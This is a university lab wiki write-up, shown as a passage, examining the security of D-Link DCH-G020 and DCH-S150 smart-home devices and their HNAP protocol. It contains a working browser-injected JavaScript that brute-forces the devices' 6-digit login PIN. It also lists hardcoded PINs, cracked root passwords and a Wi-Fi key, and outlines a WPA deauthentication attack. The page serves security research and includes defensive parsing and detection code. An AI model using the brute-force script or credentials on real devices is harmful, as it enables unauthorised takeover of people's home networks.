Examination of mydlink™ home devices

From Embedded Lab Vienna for IoT & Security
Revision as of 12:55, 19 June 2020 by JPDoe (talk | contribs) (Minor: Bug fixes. Finalization before returning the equipment.)

Summary

mydlink home: Smarthome

With the rise of Internet of Things (IoT) technology, smart home devices have become prominent. Since remote control and programmability are their selling points, manufacturers focus on advertising the usability, the “intelligence” and the efficiency of such tools, but the security and trustworthiness of these gadgets is still in question and must be established before they deserve a central role in modern households. This project introduces two devices of the mydlink™ home product lineup, the D-Link® DCH-G020 Gateway Connected Home Hub and the D-Link® DCH-S150 Home Wi-Fi Motion Sensor.

The devices in question are particularly prone to attacks through the Home Network Administration Protocol (HNAP), a proprietary network protocol which has been deprecated because of vulnerabilities in HNAP authentication. Unfortunately, HNAP is still used in some smart home devices, and the exploits can cause great harm. Future work will show whether these observations apply to all devices in the product range. It is also planned to analyze the firmware of other devices of this product family. [1]

Background Information

D-Link® DCH-G020: Gateway Connected Home Hub

D-Link states the product is no longer available for purchase, but it is still supported. The intended use-case is that it acts as a link between a pre-existing home network and one or more mydlink™ home Z-Wave and Wi-Fi devices. Customers are instructed to connect the hub to the Internet router and download the mydlink™ home app to their smartphones. The app is required; there is no other way to set up the device. After the initial setup one manages the device through the app by defining rules that are applied following different events, e.g. sending out a notification after a motion sensor is triggered. In this inspection the hub was used as a link between the home network and a motion sensor.

D-Link® DCH-S150: Home Wi-Fi Motion Sensor

This product is also no longer available for purchase, but still supported. The setup process works similarly to the hub's: one is instructed to set up and manage the device via the app. The connection to the home network is made via Wi-Fi Protected Setup (WPS), a network security standard that allows creating a new network or adding devices to an existing one without entering the Wi-Fi passphrase (e.g. the WPA2-PSK). These features also allow home users with little knowledge of wireless networks to bypass considering and handling security options. To make use of the automated integration, one must push the WPS button on the access point as well as on the client device. Shortly after, the devices enter a discovery mode, which disables itself once a connection is made. The intended use-case for the motion sensor is to receive push notifications via the app on a smartphone whenever motion is detected, or to combine it with other smart devices to enable automation, such as switching on the light when returning home.

Uninvestigated devices

Additional potentially vulnerable devices from the mydlink™ Home product line

D-Link® DCH-S160: Home Wi-Fi Water Sensor

Wherever you are, be alerted when a leak is detected in your home with the mydlink™ Home Water Sensor. It’s easy to setup, connects to your home Wi-Fi and can help you detect water leaks before serious flooding occurs.


D-Link® DCH-S220: Home Wi-Fi Siren

The mydlink™ Home Siren is a smart audio warning device with 6 different sounds built-in. It’s easy to setup, connects to your home Wi-Fi and provides instant audio alerts. It works with other mydlink Home sensors, such as the Motion Sensors, Door & Window Sensor and Monitors, to provide a loud audio warning when motion/sound is detected or a door is opened. Whether you are at home or away, push notifications will alert you whenever the Siren is activated. mydlink Home enables you to create a smart home without complicated set up, installation costs or monthly subscription charges.


D-Link® DCH-Z110: Home Door/Window Sensor

The mydlink™ Home Door/Window Sensor is a contact sensor that detects when a door or window is opened or closed, providing you with a trigger for automating your home. Integrating with D-Link’s HNAP protocol, the Door/Window Sensor connects seamlessly with your Connected Home Hub, guaranteeing compatibility and getting your smart home network up and running right away.


D-Link® DCH-Z120: Home Battery Motion Sensor

The mydlink™ Home Motion Sensor detects motion within its field of view, providing you with a trigger for automating your home. Integrating with D-Link’s HNAP protocol, the Motion Sensor connects seamlessly with your Connected Home Hub, guaranteeing compatibility and getting your smart home network up and running right away.


D-Link® DCH-Z310: Home Smoke Detector

Protect your home and loved ones with the mydlink™ Home Smoke Detector. A built-in audio alarm alerts you whenever smoke is detected and sends a push notification to your smartphone or tablet when you’re away from home. mydlink Home enables you to create a smart home without complicated set up, installation costs or monthly subscription charges.


D-Link® DCH-Z510: Home Siren with optional battery back-up

The mydlink Home Siren is a smart audio warning device with 6 different sounds built-in. It’s easy to set up and manage with the mydlink Home app, and connects to your router via the mydlink Home - Connected Home Hub.


D-Link® DCS-935L: Home Monitor HD

The mydlink™ Home Monitor HD allows you to monitor your home, whenever, from wherever. See everything in full colour high definition 720p with sound. The built-in night vision allows you to see up to 5 metres even in complete darkness. It’s easy to setup, connects to your home Wi-Fi and can even alert you when motion or sound is detected. What’s more, it works with other mydlink™ Home smart devices to enable you to create a smart home without complicated setup, installation cost or monthly subscription


D-Link® DCS-5010L: Home Monitor 360

The mydlink™ Home Monitor 360 allows you to monitor your home, whenever, from wherever. Not only does it pan and tilt to cover wider areas, the built-in night vision allows you to see up to 8 metres even in complete darkness. It’s easy to setup, connects to your home Wi-Fi and can even alert you when motion is detected. What’s more, it works with other mydlink™ Home smart devices to enable you to create a smart home without complicated setup, installation cost or monthly subscription charges.

Home Network Administration Protocol (HNAP)

On the mydlink product website one can find the following information: “Integrated with D-Link’s HNAP protocol, this secure, high performing Hub is perfect for all of your mydlink™ Home devices” [2]. Since the proprietary HNAP is a relatively unknown protocol, this project first introduces HNAP and discusses its development and characteristics. The patent application for HNAP was filed in 2007 by a company called Pure Networks, Inc. [3], which at that time provided networking software and services to home networking, small businesses, original equipment manufacturers, and broadband and Internet service providers. In 2008, Cisco bought Pure Networks, Inc. and thereby acquired HNAP and integrated it into a software product called Network Magic [4].

HNAP is a network device management protocol that allows network devices to be silently managed and administered. HNAP is based on SOAP. Before SOAP version 1.2, SOAP was the abbreviation for Simple Object Access Protocol. Since version 1.2 that expansion has been dropped because it was misleading: SOAP isn’t exclusively used for accessing objects, and the access per se cannot be described as “simple” or “easy”. SOAP now stands for itself, an Extensible Markup Language (XML)-based protocol used for communication between distributed applications. HNAP was designed to be a simple, lightweight protocol that is easy to implement inside small, cost-constrained hardware such as the devices used in this examination. Cisco promised three high-level benefits to vendors for implementing HNAP in a network device [5]:

  1. Accurate topology discovery: A network device can accurately describe itself to applications that support HNAP and show detailed information about the device.
  2. Custom task extensibility: For example, when a device with HNAP support is selected in an application, tasks related to that device can be displayed.
  3. Programmable API: The full programmable API suite allows devices’ network connections to be remotely managed and administered.

The participants in any HNAP interaction take one of two roles: HNAP server or HNAP client. HNAP servers are typically implemented inside the networking devices to be managed. HNAP clients are usually software applications residing on PCs or other devices that interact with an HNAP server in order to manage it and, ultimately, the device. [6] In the case of the mydlink product family, the smartphone app takes the client role, while the DCH-G020 Home Hub takes both roles. A typical client-server interaction begins when a client has discovered an HNAP server on a network. It issues an HNAP discovery command in order to determine the capabilities of the device. The client then proceeds to make one or more HNAP requests to the server, which performs the desired action and returns the response.

One can simply query all supported HNAP actions from a device by requesting the URL http://$DEVICE_IP/HNAP1/ from a web client. Since HNAP is encapsulated in HTTP, this is also the best way to determine whether a device is HNAP-enabled, since such devices must reply to this request. For the DCH-S150 Motion Sensor the output of that link is listed below. More or fewer SOAP actions may be available depending on the device's configuration.

ⓘ http://DCH-S150/HNAP1/
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
			<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
			<Type>ConnectedHomeClient</Type>
			<DeviceName>MotionSensorDLink</DeviceName>
			<VendorName>D-Link</VendorName>
			<ModelDescription>D-Link Motion Detector</ModelDescription>
			<ModelName>DCH-S150</ModelName>
			<DeviceMacId>C4:12:F5:1C:8E:4C</DeviceMacId>
			<FirmwareVersion>1.23</FirmwareVersion>
			<FirmwareRegion>Default</FirmwareRegion>
			<LatestFirmwareVersion/>
			<HardwareVersion>A1</HardwareVersion>
			<HNAPVersion>0124</HNAPVersion>
			<PresentationURL>http://dch.local</PresentationURL>
			<CAPTCHA>false</CAPTCHA>
			<ModuleTypes>
				<string>Motion Sensor</string>
			</ModuleTypes>
			<SOAPActions>
				<string>http://purenetworks.com/HNAP1/Reboot</string>
				<string>http://purenetworks.com/HNAP1/SetFactoryDefault</string>
				<string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
				<string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
				<string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
				<string>http://purenetworks.com/HNAP1/GetDeviceSettings2</string>
				<string>http://purenetworks.com/HNAP1/SetDeviceSettings2</string>
				<string>http://purenetworks.com/HNAP1/GetGroupSettings</string>
				<string>http://purenetworks.com/HNAP1/SetGroupSettings</string>
				<string>http://purenetworks.com/HNAP1/GetSystemLogs</string>
				<string>http://purenetworks.com/HNAP1/CleanSystemLogs</string>
				<string>http://purenetworks.com/HNAP1/GetModuleSchedule</string>
				<string>http://purenetworks.com/HNAP1/SetModuleSchedule</string>
				<string>http://purenetworks.com/HNAP1/GetModuleEnabled</string>
				<string>http://purenetworks.com/HNAP1/SetModuleEnabled</string>
				<string>http://purenetworks.com/HNAP1/GetModuleProfile</string>
				<string>http://purenetworks.com/HNAP1/SetModuleProfile</string>
				<string>http://purenetworks.com/HNAP1/GetModuleSOAPActions</string>
				<string>http://purenetworks.com/HNAP1/GetTimeSettings</string>
				<string>http://purenetworks.com/HNAP1/SetTimeSettings</string>
				<string>http://purenetworks.com/HNAP1/GetModuleGroup</string>
				<string>http://purenetworks.com/HNAP1/SetModuleGroup</string>
				<string>http://purenetworks.com/HNAP1/GetScheduleSettings</string>
				<string>http://purenetworks.com/HNAP1/SetScheduleSettings</string>
				<string>http://purenetworks.com/HNAP1/GetRecursiveSchedule</string>
				<string>http://purenetworks.com/HNAP1/SetRecursiveSchedule</string>
				<string>http://purenetworks.com/HNAP1/GetFirmwareStatus</string>
				<string>http://purenetworks.com/HNAP1/GetFirmwareValidation</string>
				<string>http://purenetworks.com/HNAP1/StartFirmwareDownload</string>
				<string>http://purenetworks.com/HNAP1/PollingFirmwareDownload</string>
				<string>http://purenetworks.com/HNAP1/CheckNewFirmware</string>
				<string>http://purenetworks.com/HNAP1/SettriggerADIC</string>
				<string>http://purenetworks.com/HNAP1/GetInternetSettings</string>
				<string>http://purenetworks.com/HNAP1/GetCurrentInternetStatus</string>
				<string>http://purenetworks.com/HNAP1/GetWLanRadios</string>
				<string>http://purenetworks.com/HNAP1/SetTriggerWirelessSiteSurvey</string>
				<string>http://purenetworks.com/HNAP1/GetSiteSurvey</string>
				<string>http://purenetworks.com/HNAP1/SetAPClientSettings</string>
				<string>http://purenetworks.com/HNAP1/GetAPClientSettings</string>
			</SOAPActions>
			<SubDeviceURLs/>
		</GetDeviceSettingsResponse>
	</soap:Body>
</soap:Envelope>
ⓘ http://DCH-G020/HNAP1/
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
	<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
		<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
		<Type>ConnectedHomeClient</Type>
		<DeviceName>DCH-G020</DeviceName>
		<VendorName>D-Link</VendorName>
		<ModelDescription>D-Link ConnectedHome Gateway</ModelDescription>
		<ModelName>DCH-G020</ModelName>
		<DeviceMacId>C4:12:F5:1A:58:F4</DeviceMacId>
		<FirmwareVersion>1.25</FirmwareVersion>
		<FirmwareRegion>Default</FirmwareRegion>
		<LatestFirmwareVersion/>
		<HardwareVersion>A1</HardwareVersion>
		<HNAPVersion>0124</HNAPVersion>
		<PresentationURL>http://dchg.local</PresentationURL>
		<CAPTCHA>false</CAPTCHA>
		<ModuleTypes>
		<string>Gateway</string>
		</ModuleTypes>
		<SOAPActions>
			<string>http://purenetworks.com/HNAP1/Reboot</string>
			<string>http://purenetworks.com/HNAP1/SetFactoryDefault</string>
			<string>http://purenetworks.com/HNAP1/IsDeviceReady</string>
			<string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
			<string>http://purenetworks.com/HNAP1/SetDeviceSettings</string>
			<string>http://purenetworks.com/HNAP1/GetDeviceSettings2</string>
			<string>http://purenetworks.com/HNAP1/SetDeviceSettings2</string>
			<string>http://purenetworks.com/HNAP1/GetGroupSettings</string>
			<string>http://purenetworks.com/HNAP1/SetGroupSettings</string>
			<string>http://purenetworks.com/HNAP1/GetSystemLogs</string>
			<string>http://purenetworks.com/HNAP1/CleanSystemLogs</string>
			<string>http://purenetworks.com/HNAP1/GetModuleSchedule</string>
			<string>http://purenetworks.com/HNAP1/SetModuleSchedule</string>
			<string>http://purenetworks.com/HNAP1/GetModuleEnabled</string>
			<string>http://purenetworks.com/HNAP1/SetModuleEnabled</string>
			<string>http://purenetworks.com/HNAP1/GetModuleProfile</string>
			<string>http://purenetworks.com/HNAP1/SetModuleProfile</string>
			<string>http://purenetworks.com/HNAP1/GetModuleSOAPActions</string>
			<string>http://purenetworks.com/HNAP1/GetTimeSettings</string>
			<string>http://purenetworks.com/HNAP1/SetTimeSettings</string>
			<string>http://purenetworks.com/HNAP1/GetModuleGroup</string>
			<string>http://purenetworks.com/HNAP1/SetModuleGroup</string>
			<string>http://purenetworks.com/HNAP1/GetScheduleSettings</string>
			<string>http://purenetworks.com/HNAP1/SetScheduleSettings</string>
			<string>http://purenetworks.com/HNAP1/GetRecursiveSchedule</string>
			<string>http://purenetworks.com/HNAP1/SetRecursiveSchedule</string>
			<string>http://purenetworks.com/HNAP1/GetFirmwareStatus</string>
			<string>http://purenetworks.com/HNAP1/GetFirmwareValidation</string>
			<string>http://purenetworks.com/HNAP1/StartFirmwareDownload</string>
			<string>http://purenetworks.com/HNAP1/PollingFirmwareDownload</string>
			<string>http://purenetworks.com/HNAP1/CheckNewFirmware</string>
			<string>http://purenetworks.com/HNAP1/SettriggerADIC</string>
			<string>http://purenetworks.com/HNAP1/GetInternetSettings</string>
			<string>http://purenetworks.com/HNAP1/GetCurrentInternetStatus</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadios</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadioSettings</string>
			<string>http://purenetworks.com/HNAP1/SetWLanRadioSettings</string>
			<string>http://purenetworks.com/HNAP1/GetWLanRadioSecurity</string>
			<string>http://purenetworks.com/HNAP1/SetWLanRadioSecurity</string>
		</SOAPActions>
		<SubDeviceURLs/>
		</GetDeviceSettingsResponse>
	</soap:Body>
</soap:Envelope>

Note: Network Magic was discontinued in 2012, because HNAP was abused on several occasions. It was possible to learn technical details of a device through HNAP, therefore exposing its vulnerable points for malicious attacks. [7][8][9][10]
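Parsing the discovery response shown above programmatically is the natural first step of an inventory or assessment of HNAP-enabled hosts. The following Python parser is an added example and not code from this page, from the project or from D-Link: it reads a GetDeviceSettingsResponse envelope of the shape listed above, extracts model, MAC, firmware and the advertised SOAPActions, and flags what an assessor would note, namely state-changing actions advertised to an unauthenticated client and CAPTCHA set to false. The embedded sample is a constructed, shortened copy of the DCH-S150 output, and the set of actions treated as sensitive is this example's own choice.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

HNAP_NS = "http://purenetworks.com/HNAP1/"

# Actions that change device state or firmware. Which actions count as sensitive is a
# choice made for this example; the names themselves come from the listing above.
SENSITIVE_ACTIONS = {
    "Reboot", "SetFactoryDefault", "StartFirmwareDownload",
    "SetWLanRadioSecurity", "SetAPClientSettings", "SetDeviceSettings",
}

# Constructed sample: a shortened copy of the DCH-S150 GetDeviceSettingsResponse shape.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
      <GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
      <Type>ConnectedHomeClient</Type>
      <ModelName>DCH-S150</ModelName>
      <DeviceMacId>C4:12:F5:1C:8E:4C</DeviceMacId>
      <FirmwareVersion>1.23</FirmwareVersion>
      <HNAPVersion>0124</HNAPVersion>
      <CAPTCHA>false</CAPTCHA>
      <SOAPActions>
        <string>http://purenetworks.com/HNAP1/Reboot</string>
        <string>http://purenetworks.com/HNAP1/SetFactoryDefault</string>
        <string>http://purenetworks.com/HNAP1/GetDeviceSettings</string>
        <string>http://purenetworks.com/HNAP1/StartFirmwareDownload</string>
        <string>http://purenetworks.com/HNAP1/SetAPClientSettings</string>
      </SOAPActions>
    </GetDeviceSettingsResponse>
  </soap:Body>
</soap:Envelope>
"""


def parse_device_settings(xml_text: str) -> Dict[str, object]:
    """Extract the inventory-relevant fields from a GetDeviceSettingsResponse envelope."""
    root = ET.fromstring(xml_text)
    resp = root.find(f".//{{{HNAP_NS}}}GetDeviceSettingsResponse")
    if resp is None:
        # A host that answers /HNAP1/ with anything else is not speaking HNAP.
        raise ValueError("not a GetDeviceSettingsResponse; host is probably not HNAP-enabled")

    def text(tag: str) -> str:
        el = resp.find(f"{{{HNAP_NS}}}{tag}")
        return (el.text or "").strip() if el is not None else ""

    # Keep only the action name; the URI prefix is the same for every entry.
    actions: List[str] = [
        (s.text or "").strip().rsplit("/", 1)[-1]
        for s in resp.findall(f"{{{HNAP_NS}}}SOAPActions/{{{HNAP_NS}}}string")
    ]
    return {
        "model": text("ModelName"),
        "mac": text("DeviceMacId"),
        "firmware": text("FirmwareVersion"),
        "hnap_version": text("HNAPVersion"),
        "captcha": text("CAPTCHA").lower() == "true",
        "actions": actions,
    }


def risk_findings(info: Dict[str, object]) -> List[str]:
    """Turn the parsed fields into the findings an assessor would record."""
    findings = []
    exposed = sorted(SENSITIVE_ACTIONS.intersection(info["actions"]))
    if exposed:
        findings.append("state-changing actions advertised: " + ", ".join(exposed))
    if not info["captcha"]:
        findings.append("CAPTCHA disabled: login endpoint accepts unattended guessing")
    return findings


if __name__ == "__main__":
    device = parse_device_settings(SAMPLE_RESPONSE)
    print(device["model"], device["mac"], "firmware", device["firmware"])
    for finding in risk_findings(device):
        print(" -", finding)
```

Against a live device the same function would be fed the body of an HTTP GET to http://$DEVICE_IP/HNAP1/; a non-HNAP host raises ValueError instead of silently returning empty fields.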

Examination

Summary

ⓘ Collected Information
| Property | DCH-G020 | DCH-S150 |
|---|---|---|
| Device Model | DCH-G020 | DCH-S150 |
| Manufacturer | D-Link | D-Link |
| Product Type | Smart Hub | Motion Sensor |
| Description | mydlink™ Home Connected Hub | mydlink™ Home Wi-Fi Motion Sensor |
| Price on Release | 90 Euro | 40 Euro |
| Release | 2015 Q2 (Discontinued but supported) | 2014 Q3 (Discontinued but supported) |
| State of Research | UART, U-Boot, root, ro FS | Wrote tool to exploit HNAP |
| Ports | USB B, 2x FE | N/A |
| Buttons | WPS, Z-Wave pairing, Reset | WPS, Reset |
| LED | Status | Status |
| Power | 5V/2A (3W max.) | 230V AC, 50/60Hz |
| WLAN | 2.4GHz 802.11 b/g/n up to 300Mbit/s | 2.4GHz 802.11 b/g/n |
| Other | Z-Wave: 868.40 MHz | N/A |
| FCC-ID | KA2CHG020A1 | KA2CHS150A1 |
| System | QCA953x | QCA953x |
| Processor | MIPS 24Kc V7.4 | MIPS 24Kc V7.4 |
| BogoMIPS | 365.56 | 365.56 |
| Memory | DRAM: 64M | DRAM: 32M |
| Storage | Flash: 16MB (NOR) | Flash: 8MB (NOR) |
| Ethernet MAC | eth0/eth1/br0: c4:12:f5:1a:58:f4 | Device 1: eth0/eth1/br0: c4:12:f5:1c:8e:4c; Device 2: eth0/eth1/br0: c4:12:f5:1c:8e:56 |
| WLAN MAC | wifi0: c4:12:f5:1a:58:f4 | Device 1: wifi0: 06:12:f5:1c:8e:56; Device 2: wifi0: 06:12:f5:1c:8e:4c |
| WLAN SSID | DCH-G020-58F4 | Device 1: DCH-S150-8E56; Device 2: DCH-S150-8E4C |
| WLAN PSK | 8482c238 | None |
| Default IPv4 | 192.168.0.80/24 | 192.168.0.60/24 |
| Hostname | DCH-G020 | DCH-S150 |
| NET Protocols | HNAP; HTTP; UPnP | HNAP; HTTP |
| Interfaces | ttyS0: console; ath0: VAP device; sit0: IPv6-in-IPv4 | ttyACM0: USB ACM device; ttyS0: console; ath0/ath1: VAP device; sit0: IPv6-in-IPv4 |
| Ports | 80 http lighttpd 1.4.48; 49152 upnpd (UPnP 1.0) | 80 http lighttpd 1.4.48 |
| Webpage | http://192.168.0.60 | http://192.168.0.80/Login.html |
| Webaccess | Admin: "139885" (unchangeable) | Admin: "653508" (unchangeable); Admin: "770383" (unchangeable) |
| Root Password | whatsup (brute-force) | qsefthuko; (brute-force) |
| Other Login Pw | adm, bin, daemon, nobody: None | adm, bin, daemon, nobody: None |
| Firmware | 1.00 | 1.06 |
| Hardware | A1 | A1 (others A2, B) |
| Baudrate | Linux: 115200 bps (8N1); U-Boot: 115200 bps (7N1) | Linux: 115200 bps (8N1); U-Boot: 115200 bps (7N1) |
| Bootdelay | 3s (Any key) | 3s (Any key) |
| U-Boot | 1.1.4-LSDK-10.1.432 (Mar 17 2015) | 1.1.4-LSDK-10.1.432 (Apr 8 2014) |
| mtdparts | ath-nor0: 64k(u-boot), 64k(ART), 64k(MP), 64k(config), 64k(bootarg), 2048k(uImage), 12736k(rootfs1), 64k(log), 512k(mydlink), 512k(data1), 128k(data2), 64k(data3) | ath-nor0: 64k(u-boot), 64k(ART), 64k(MP), 64k(config), 64k(log), 896k(bk_uImage), 1536k(bk_rootfs), 896k(uImage), 4032k(rootfs), 2432k@0x50000(bk_firmware), 4928k@0x2b0000(firmware), 512k@0x780000(mydlink) |
| Filesystem | squashfs (root): version 4.0 (2009/01/31); JFFS2 (mtd8 to /dch) version 2.2 (NAND) | squashfs (root): version 4.0 (2009/01/31); JFFS2 (mtd11 to /dch) version 2.2 (NAND) |
| Image | Linux kernel image (2016-06-29); Linux 2.6.31 (Jun 29 2016) (adminuser@adminuser-VirtualBox) (gcc version 4.3.3 (GCC)) | Linux kernel image (2018-01-03), backup-mode Linux kernel available; Linux 2.6.31 (Jan 3 2018) (root@minlee-Mint17) (gcc version 4.3.3 (GCC)) |
| Kernel cmdline | console=ttyS0,115200 init=/sbin/init root=31:6 rootfstype=squashfs mtdparts=${mtdparts} | console=ttyS0,115200 init=/sbin/init root=31:8 rootfstype=squashfs mtdparts=${mtdparts} mem=32M |
| Shell | sh / ash | sh / ash |
| BusyBox | v1.21.1-LSDK-10.2 (2016-06-29) | v1.21.1-LSDK (2018-01-03) |
| Services | lighttpd/1.4.34; hostapd v2.0-devel; udhcpc (v1.21.1); control_center; app_center; lan_center; wifi_center; dchc_center; zw_meter_check; zw_center (/dev/ttyACM0) | lighttpd/1.4.48; hostapd v2.0-devel; control_center; lan_center; wifi_center; dchc_center; nf_conntrack version 0.5.0 |

Online

WLAN

To compromise the mydlink Home product line using HNAP or any other TCP/IP-based attack, it is necessary to gain access to the WLAN the devices are operating in. The method used in this examination is based on capturing the WPA/WPA2 authentication handshake and then cracking the Pre-Shared Key (PSK). Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access 2 (WPA2) are security protocols to secure wireless networks. While WPA/WPA2 superseded the flawed Wired Equivalent Privacy (WEP), WPA also has its security issues: it remains vulnerable to brute-force attacks on weak passphrases. When initially configuring the devices, the DCH-S150 Motion Sensor exposes an unsecured WLAN with access to the device. This WLAN is switched off once the device is set up using the app and subsequently paired with the DCH-G020 Home Hub, while the hub keeps its AP up and running the whole time.

Note: The HNAP API may be used to set up the device manually without the corresponding app, by configuring the DCH-S150 Motion Sensor using the HNAP1 SetAPClientSettings method.

Deauthentication Attack

The attack in this examination was carried out using the aircrack-ng suite. Since the setup was already in a working condition, the client, in this case the motion sensor, was forced to deauthenticate from the access point, in this case the hub. The goal is to force the motion sensor to drop its association with the access point, causing a reauthentication, using aireplay-ng; the new authentication handshake can then be captured. Through this the WPA/WPA2-PSK material was obtained, and using John the Ripper or Hashcat an attempt was made to crack the password with a suitable word list. More about this process can be found in the article WPA/WPA2 PSK deauthentication attack.

Network Mapper

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
PORT      STATE SERVICE VERSION
80/tcp    open  http    lighttpd 1.4.34
|_http-server-header: lighttpd/1.4.34
|_http-title: 400 - Bad Request

49152/tcp open  upnp    Cisco-Linksys E4200 WAP upnpd (UPnP 1.0)

MAC Address: C4:12:F5:1A:58:F4 (D-Link International)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Service Info: CPE: cpe:/h:cisco:e4200
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor
80/tcp    open     http    lighttpd 1.4.48
|_http-server-header: lighttpd/1.4.48
|_http-title: Site doesn't have a title (text/html).

MAC Address: C4:12:F5:1C:8E:4C (D-Link International)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36

Web Interface

A compressed copy of the DCH-G020 Home Hub client-side webpage can be found here, and a compressed copy of the DCH-S150 Motion Sensor client-side webpage can be found here. The website does have authentication using a challenge-response mechanism. The webpage itself provides no functionality besides authentication and displaying some device information. Notably, it is not possible to change any configuration of the device in the web interface at all; legitimate users can’t manage their devices through it. Since the device can be managed through HNAP actions, the next logical step was to forge HNAP messages to manipulate the device.

ⓘ D-Link® DCH-G020: Gateway Connected Home Hub
ⓘ D-Link® DCH-S150: Home Wi-Fi Motion Sensor

Brute-Force Pin

To attack the web interface PIN, access to the wireless network of the devices is necessary. From this point forward, this examination proceeds on the assumption that access to the network was gained. The password for the web interface is a numeric 6-character PIN which is hardcoded in the device, leading to a keyspace of only 10^6 possible passwords matching ^[0-9]{6}$.

Note: This password is used with the web interface login form and also for authentication within HNAP actions from the corresponding mobile application. Thus it is used for manual execution of HNAP actions in further steps.

Requesting the web page of the device at its assigned IP address in a browser yields a login form with the pre-filled username “Admin”. One can view Login.html and its associated JavaScript files (.js), which are AES.js, hmac_md5.js and soapclient.js. The latter confirms that the motion sensor uses the SOAP protocol. Each of these script files has proven useful and has been used to provide the basic functionality for injecting SOAP actions. Upon further investigation, the do_login() function was discovered. This method is called upon clicking the Login button. It loads the input parameters User Name and Password and verifies the authentication of said parameters. Using this method, a script was written to brute-force the 6-digit PIN of the web interface. This script uses only existing functions provided by the device, but specialised tools like THC-Hydra may also be used. In order to execute the script, open the web browser's console within its developer tools. By pasting the script below into the console, the send_login_cmd_result() function is overridden: instead of alerting the user that the login was unsuccessful, it tries the next possible password on failure. In order to reuse existing code, the new password to try is simply written into the corresponding HTML input field. Additionally, this input field is switched from type='password' to type='text' for better visualisation of the brute-force progress.

ⓘ Brute-Force_Pin.inject.js

For execution this code must be injected into the client-side mydlink web page via the browser console.

// Use timer
// 27s per 100 tries; estimated max: 3.1 days; avg: 1.55 days
// 20s per 100 tries with 4 web "threads"; estimated max: 2.3 days; avg: 1.15 days
var t0 = performance.now();

// Example Pins
// DCH-S150: 653508
// DCH-G020: 139885
let PIN = 0, MAX = 999999;

// Override the embedded function of the same name. $ (jQuery), LOGIN and do_login()
// are provided by the device's own page scripts and are used unchanged.
function send_login_cmd_result ( http_req ) {
    // Parse response from login action to XML
    var $xml = $( $.parseXML( http_req.responseText ) );

    // Check if login attempt was successful
    if( $xml.find( LOGIN + "Result" ).text() == "success" )
    {
        // Stop timer
        var t1 = performance.now();
        // Display valid password and time
        alert( "PIN: " + PIN + '\n' + "Time: " + (t1-t0)/1000 +  "s.");
    }
    // Increment PIN if not reached MAX
    else if ( ++PIN <= MAX )
    {
        // Try next PIN
        bfPIN();
    }
}

// Added function to set new PIN and trigger login process
function bfPIN ()
{
    // Zero-pad PIN to a six-digit string
    var sPIN = ("000000"+PIN).substr(("000000"+PIN).length-6);
    // Set sPIN to #user_pwd input field
    $("#user_pwd").val(sPIN);
    // Trigger login process (unchanged page function)
    do_login();
}

// Replace input fields from type password with type text for visibility and progress insights
$('body')
   .find('input:password')
   .each( function() {
      $("<input type='text' />")
         .attr({ id: this.id, name: this.name, value: this.value })
         .insertBefore(this);
   })
   .remove();

// Start all the above
bfPIN();
ⓘ Brute-Force_Pin.inject.min.js
let PIN = 0, MAX = 999999;

// Override embedded function; $, LOGIN and do_login() come from the page's own scripts
function send_login_cmd_result (http_req) {
    var $xml = $($.parseXML(http_req.responseText));
    if(http_req && $xml.find(LOGIN + "Result").text() == "success"){
        alert(PIN);
    } else if ( ++PIN <= MAX ) {
        $("#user_pwd").val(("000000"+PIN).substr(("000000"+PIN).length-6));
        do_login();
    }
}

// Start bruteforcing PIN: a null response parses to an empty document, so the
// first call falls through to the "try next PIN" branch
send_login_cmd_result({"responseText": null});

Note: It is important to mention that the do_login() method has not been changed in any way for this attack. The only method that has been altered is send_login_cmd_result(), to bypass the “Password wrong” notifications, resulting in a more time-efficient and simple brute-force attack using existing code.

Note: The login process can be analyzed using Wireshark or similar tools.

It is possible to attempt 100 tries in 20 seconds while executing the script four times in parallel. Unfortunately the motion sensor couldn’t handle more than four “threads”, attempts were skipped and the whole process became slower. With 1 million different combinations the expected value of tries in a successful brute force attack amounts to 500,000 on average. Therefore, it is estimated that one can crack the pin in ca. 1.15 days on average with a maximum of ca. 2.3 days.
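The rate measured above, 100 login attempts per 20 seconds from a single client, is also the signal a defender can look for on the device side or on a monitoring proxy in front of it. The following Python snippet is an added example, not code from the page or the project: it runs a sliding-window counter over lighttpd-style access log lines and flags any source that sends 20 or more POSTs to /HNAP1/ within 60 seconds. Since a failed login is reported inside the SOAP body rather than through the HTTP status (the scripts above test the LoginResult text, not the status code), request volume per source, not a status code, is what has to be counted. The log lines are constructed for this example; the threshold, window and log format are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Matches lighttpd's default access log line (%h %V %u %t "%r" %>s ...) and
# Apache-style common/combined logs, which have the same four leading fields.
LOG_RE = re.compile(
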